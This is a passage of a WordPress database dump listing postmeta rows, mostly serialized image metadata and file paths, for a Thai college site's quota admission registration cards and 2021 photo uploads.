(27363, 11109, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:72;s:4:\"file\";s:37:\"2019/12/ปวช.โควตา.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"ปวช.โควตา-150x72.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"ปวช.โควตา-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27364, 11110, '_wp_attached_file', '2019/12/ปวส.โควตา.jpg'),
(27365, 11110, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:72;s:4:\"file\";s:37:\"2019/12/ปวส.โควตา.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"ปวส.โควตา-150x72.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"ปวส.โควตา-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27366, 11117, '_wp_attached_file', '2019/12/ว่าง.png'),
(27367, 11117, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:72;s:4:\"file\";s:24:\"2019/12/ว่าง.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ว่าง-150x72.png\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"ว่าง-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27368, 11118, '_wp_attached_file', '2019/12/ว่าง3.png'),
(27369, 11118, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:216;s:6:\"height\";i:72;s:4:\"file\";s:25:\"2019/12/ว่าง3.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"ว่าง3-150x72.png\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27370, 11121, '_wp_attached_file', '2019/12/ว่าง3-1.png'),
(27371, 11121, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:216;s:6:\"height\";i:72;s:4:\"file\";s:27:\"2019/12/ว่าง3-1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ว่าง3-1-150x72.png\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27372, 11123, '_edit_lock', '1613736644:14'),
(27373, 11124, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวส-2564.xls'),
(27374, 11125, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวช-2564.xls'),
(27375, 11123, '_edit_last', '14'),
(27376, 11123, '_hide_featured', NULL),
(27377, 11128, '_wp_attached_file', '2021/02/บัตร-ปวช..jpg'),
(27378, 11128, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:35:\"2021/02/บัตร-ปวช..jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"บัตร-ปวช.-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"บัตร-ปวช.-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"บัตร-ปวช.-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"บัตร-ปวช.-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27379, 11130, '_edit_lock', '1613736513:14'),
(27380, 11130, '_edit_last', '14'),
(27381, 11130, '_hide_featured', NULL),
(27382, 11133, '_wp_attached_file', '2019/12/ปริญญาตรี.jpg'),
(27383, 11133, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:39:\"2019/12/ปริญญาตรี.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ปริญญาตรี-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"ปริญญาตรี-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"ปริญญาตรี-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"ปริญญาตรี-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27384, 11135, '_wp_attached_file', '2019/12/ปริญญาตรี-1.jpg'),
(27385, 11135, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:41:\"2019/12/ปริญญาตรี-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"ปริญญาตรี-1-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"ปริญญาตรี-1-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"ปริญญาตรี-1-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"ปริญญาตรี-1-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27386, 11146, '_wp_attached_file', '2019/12/5.3.png'),
(27387, 11146, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:22;s:4:\"file\";s:15:\"2019/12/5.3.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"5.3-150x22.png\";s:5:\"width\";i:150;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"5.3-300x18.png\";s:5:\"width\";i:300;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27388, 11163, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวส-2564-1.xls'),
(27392, 11169, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวช-2564-2.xls'),
(27393, 11163, '_edit_lock', '1612519166:14'),
(27394, 11172, '_edit_lock', '1612750698:14'),
(27395, 11172, '_edit_last', '14'),
(27396, 11173, '_wp_attached_file', '2021/02/090264-11.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(27397, 11173, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-11-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-11-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-11-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-11-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27398, 11174, '_wp_attached_file', '2021/02/090264-10.jpg'),
(27399, 11174, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-10-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-10-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27400, 11175, '_wp_attached_file', '2021/02/090264-09.jpg'),
(27401, 11175, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27402, 11176, '_wp_attached_file', '2021/02/090264-08.jpg'),
(27403, 11176, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27404, 11177, '_wp_attached_file', '2021/02/090264-07.jpg'),
(27405, 11177, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27406, 11178, '_wp_attached_file', '2021/02/090264-06.jpg'),
(27407, 11178, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27408, 11179, '_wp_attached_file', '2021/02/090264-05.jpg'),
(27409, 11179, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27410, 11180, '_wp_attached_file', '2021/02/090264-04.jpg'),
(27411, 11180, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27412, 11181, '_wp_attached_file', '2021/02/090264-03.jpg'),
(27413, 11181, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27414, 11182, '_wp_attached_file', '2021/02/090264-02.jpg'),
(27415, 11182, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"